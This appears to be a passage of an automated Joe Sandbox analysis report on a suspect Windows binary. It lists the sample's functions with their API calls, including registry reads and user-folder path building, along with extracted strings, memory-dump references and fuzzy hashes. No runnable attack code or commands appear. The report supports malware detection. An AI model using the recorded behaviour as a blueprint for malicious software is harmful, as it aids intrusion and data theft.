                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 7156f4e4eb364a13fb38a643f639587360fc41a33f703ab7f3cd0f37ea7f1349
                                • Instruction ID: 6ca8dfa403a3ba63ceeb30cb99bfd4952d73eeaf060e2cd3d859d9405f125627
                                • Opcode Fuzzy Hash: 7156f4e4eb364a13fb38a643f639587360fc41a33f703ab7f3cd0f37ea7f1349
                                • Instruction Fuzzy Hash: 9121D3B1518341AF8350DF69D88496BBBF9FEC8214F408A1EF599C3220EB309604CBA6
                                Function 006E3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00F0B9D0,00000000,00020119,?), ref: 006E318C
                                • RegQueryValueExA.ADVAPI32(?,00F1F140,00000000,00000000,00000000,000000FF), ref: 006E31A7
                                • RegCloseKey.ADVAPI32(?), ref: 006E31B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 4c6d3fceabaf7711d9323d5cb284d1e940d763ca6afa7f10aeb3d4c1ebf538dc
                                • Instruction ID: 386984362a0728f088fe7cf4c9c02a487d78a793b354900a93f405f5fe6a2e01
                                • Opcode Fuzzy Hash: 4c6d3fceabaf7711d9323d5cb284d1e940d763ca6afa7f10aeb3d4c1ebf538dc
                                • Instruction Fuzzy Hash: F3116D72A00208AFD710CBA5DC49FBBBBBCF788B11F004229FA05E3680DB755900CBA1
                                Function 006E90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 8eb318d3f1b8c17e9640c6787923384909d13ecc2fdb5b5a4b991364c20a47d0
                                • Instruction ID: c6e619aa2c8eb140984990dd1a6cca6d5919281fba79d86a8e0a20fb8c3a9072
                                • Opcode Fuzzy Hash: 8eb318d3f1b8c17e9640c6787923384909d13ecc2fdb5b5a4b991364c20a47d0
                                • Instruction Fuzzy Hash: 1D41E4705057DCAEDF218B268C85FFB7BFA9F45344F1444E8EA8686182E2719B458F34
                                Function 006C8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C8996
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1D5
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C89CD
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: f722fa67fb41a73d9eb10218214063a7dcc8512100e4cdbcc98ae604f3c051d8
                                • Instruction ID: 3833fac069cc608b1ba62952e9cb77a3a0fab7113fc614b8787caccf85464eb5
                                • Opcode Fuzzy Hash: f722fa67fb41a73d9eb10218214063a7dcc8512100e4cdbcc98ae604f3c051d8
                                • Instruction Fuzzy Hash: 5A2180723006509FC7309A9DE840FBAF7AADBA1761B15096FF156CB681CA71DC41C3AA
                                Function 006C8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C8883
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 421400f5196e3feb80e7a006897fcb0cebf243e8fa2b503da748e95f28665bdb
                                • Instruction ID: a07ee958090e8ecc88cedaba59c190b85b5a17e8f6c79dbb6285b250838fdd0d
                                • Opcode Fuzzy Hash: 421400f5196e3feb80e7a006897fcb0cebf243e8fa2b503da748e95f28665bdb
                                • Instruction Fuzzy Hash: FD3197B5E005159FCB18DF58C891BAEBBB6EB88350F14826DE9159F385DB30AD01CB91
                                Function 006E5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5922
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 066287a3c8543959d8fa17e47d2db91ed332d07d180b2eac0a24aa40304025c3
                                • Instruction ID: 74ac79bbd015f8590fc042c861eae7e2f9fa4546ecab6d45c4268b3e117ab0b5
                                • Opcode Fuzzy Hash: 066287a3c8543959d8fa17e47d2db91ed332d07d180b2eac0a24aa40304025c3
                                • Instruction Fuzzy Hash: 54113031305BC0CBC7318B2DE840B9A77E3AB92765F250A9DF0D28B796DB61D841C7A5
                                Function 006E3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,006EA430,000000FF), ref: 006E3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E3D27
                                • wsprintfA.USER32 ref: 006E3D37
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 5a3d39e2c1732242f56be373cd06d0cb91b001c21a46f12e34a809f6df1d56bb
                                • Instruction ID: f2b1fa0b6ea81e732041c5ead3c92a34d65ace327028e80959482045d58047f0
                                • Opcode Fuzzy Hash: 5a3d39e2c1732242f56be373cd06d0cb91b001c21a46f12e34a809f6df1d56bb
                                • Instruction Fuzzy Hash: 1B01CC72640B54FFE7209BA5DC0EF7ABBA8FB85B61F100115FA05972D0CBB41900CAA5
                                Function 006C8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C8737
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 28af8a4a1c8b3de0da79547a859bebb8b76945833f615f7fc44bfb32d79937ef
                                • Instruction ID: 6379dad86ccdc683ae897e36551956bfc62497ec6af9191077344d05c9a34054
                                • Opcode Fuzzy Hash: 28af8a4a1c8b3de0da79547a859bebb8b76945833f615f7fc44bfb32d79937ef
                                • Instruction Fuzzy Hash: A4F09037B400210F8364643D8D849AEA947D6E539033AD769E91AEF399EC70EC8285E4
                                Function 006E86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006E781C: __mtinitlocknum.LIBCMT ref: 006E7832
                                  • Part of subcall function 006E781C: __amsg_exit.LIBCMT ref: 006E783E
                                • ___addlocaleref.LIBCMT ref: 006E8756
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xuo$xto
                                • API String ID: 3105635775-2015942664
                                • Opcode ID: 335b1d0f498b33ca82b1067dfb52f80a275dffc2b26ff78407bf55845077cbec
                                • Instruction ID: f14839fdefceb4515f3ff3e6f117a3378dd975e0e1dfd12bb421af02063e7e6e
                                • Opcode Fuzzy Hash: 335b1d0f498b33ca82b1067dfb52f80a275dffc2b26ff78407bf55845077cbec
                                • Instruction Fuzzy Hash: 7A01D671446B40DED760AF7AD80575BFBE1AF10324F20891DE1DA576E0CFB0AA44CB54
                                Function 006DE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE573
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE581
                                • lstrcat.KERNEL32(?,00F1F400), ref: 006DE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: cb116a0f35225e324d08cfba0410d2b24bc5656b8ee0fd36a9934cc606de4c43
                                • Instruction ID: de8c2980f507456cd5538747c3b36b28e96dac380ab2af29731677a415b42869
                                • Opcode Fuzzy Hash: cb116a0f35225e324d08cfba0410d2b24bc5656b8ee0fd36a9934cc606de4c43
                                • Instruction Fuzzy Hash: 0E5193B5A10108AFCB94EBA5DC46EFE337AFB88310F44445DB90997341EE71AE41CBA4
                                Function 006E1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006E1FDF, 006E1FF5, 006E20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
